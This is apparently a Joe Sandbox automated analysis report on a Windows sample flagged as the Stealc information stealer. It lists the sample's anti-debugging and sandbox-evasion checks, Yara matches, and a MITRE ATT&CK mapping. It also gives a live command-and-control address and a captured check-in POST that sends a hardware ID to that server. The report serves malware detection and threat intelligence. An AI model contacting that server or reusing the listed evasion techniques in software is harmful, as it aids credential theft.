                Source: file.exe, file.exe, 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2284650077.0000000000F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW4
                Source: file.exe, 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2284650077.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2284650077.0000000000F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13334
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13331
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13385
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13345
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13353
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001245C0 VirtualProtect ?,00000004,00000100,000000000_2_001245C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00139860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139750 mov eax, dword ptr fs:[00000030h]0_2_00139750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00137850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00137850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2836, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00139600
                Source: file.exe, file.exe, 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00137B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00136920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00136920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00137850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00137850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00137A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00137A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.120000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2243095169.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2836, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.120000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2243095169.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2836, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe47%ReversingLabsWin32.Trojan.Generic
                file.exe56%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phpO17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpg17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpS17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpLMEMfile.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpOfile.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/rnfile.exe, 00000000.00000002.2284650077.0000000000F4A000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/wsfile.exe, 00000000.00000002.2284650077.0000000000F33000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpSfile.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    http://185.215.113.37/e2b1563c6670f193.phpknfile.exe, 00000000.00000002.2284650077.0000000000F4A000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.372file.exe, 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpgfile.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmptrueunknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1532539
                        Start date and time:2024-10-13 16:03:10 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 18s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 84
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.947890099570414
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'886'720 bytes
                        MD5:015cafabe41e132a67c25584d105f0f0
                        SHA1:a4703fbfea7295fbb9bf105b5fee62d35de76c45
                        SHA256:254d42da1d65f92aef7b230e84b29b358a39a7fc9465097ab4223101a8a08edf
                        SHA512:df36ed83723a199c46c6fbb5a99e5a07976367adf3e57694a596d6aa8d27fd0f450f349271ac30a832c0b34764edbe499d936b6221410ad64ccaf87eac03f96e
                        SSDEEP:49152:K/R0cU20RdXmEtC5yBhHWZV7vG0noQRJ:KfGJ1e7v3j
                        TLSH:699533299DA9E431DD7D4B398B1E8659D2E0F3FE009CEEB39F7910344662ABD720D901
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xab1000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F2AF8AE23BAh
                        push gs
                        sbb al, 00h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        jmp 00007F2AF8AE43B5h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [0B00000Ah], al
                        or al, byte ptr [eax]
                        add byte ptr [esi], al
                        or al, byte ptr [eax]
                        add byte ptr [edx+ecx], al
                        add byte ptr [eax], al
                        add dword ptr [edx], ecx
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        push es
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [edx], ecx
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        and byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [edx], ecx
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x22800f8946e8cc7c7ba45dd10ad81d33b4362unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x25e0000x2ab0000x20004868a13416f701251984fcc86160a51unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        mixhorwq0x5090000x1a70000x1a6800b6b79b716c2c0e1d06c2be29e0554d2bFalse0.9949484559911242data7.953784616003966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        mafznnfz0x6b00000x10000x400c8f2d48ae9a3a42513e9445215c0355dFalse0.7509765625data5.928004470648576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x6b10000x30000x22002d67e8f56560997c7bac1beb6f534d6fFalse0.06525735294117647DOS executable (COM)0.8001893407006354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-13T16:04:19.721286+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649735185.215.113.3780TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 13, 2024 16:04:18.717837095 CEST4973580192.168.2.6185.215.113.37
                        Oct 13, 2024 16:04:18.722830057 CEST8049735185.215.113.37192.168.2.6
                        Oct 13, 2024 16:04:18.722948074 CEST4973580192.168.2.6185.215.113.37
                        Oct 13, 2024 16:04:18.723606110 CEST4973580192.168.2.6185.215.113.37
                        Oct 13, 2024 16:04:18.728440046 CEST8049735185.215.113.37192.168.2.6
                        Oct 13, 2024 16:04:19.470590115 CEST8049735185.215.113.37192.168.2.6
                        Oct 13, 2024 16:04:19.470664024 CEST4973580192.168.2.6185.215.113.37
                        Oct 13, 2024 16:04:19.476671934 CEST4973580192.168.2.6185.215.113.37
                        Oct 13, 2024 16:04:19.481503963 CEST8049735185.215.113.37192.168.2.6
                        Oct 13, 2024 16:04:19.721189976 CEST8049735185.215.113.37192.168.2.6
                        Oct 13, 2024 16:04:19.721286058 CEST4973580192.168.2.6185.215.113.37
                        Oct 13, 2024 16:04:21.755022049 CEST4973580192.168.2.6185.215.113.37

                        HTTP Request Dependency Graph

                        • 185.215.113.37

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.649735185.215.113.37802836C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Oct 13, 2024 16:04:18.723606110 CEST89OUTGET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 13, 2024 16:04:19.470590115 CEST203INHTTP/1.1 200 OK
                        Date: Sun, 13 Oct 2024 14:04:19 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 13, 2024 16:04:19.476671934 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGD
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 46 43 43 35 41 32 32 45 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 2d 2d 0d 0a
                        Data Ascii: ------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="hwid"FBFCC5A22EA51915334237------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="build"doma------CAKKJKKECFIDGDHIJEGD--
                        Oct 13, 2024 16:04:19.721189976 CEST210INHTTP/1.1 200 OK
                        Date: Sun, 13 Oct 2024 14:04:19 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:10:04:13
                        Start date:13/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x120000
                        File size:1'886'720 bytes
                        MD5 hash:015CAFABE41E132A67C25584D105F0F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2243095169.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:7.7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:9.7%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
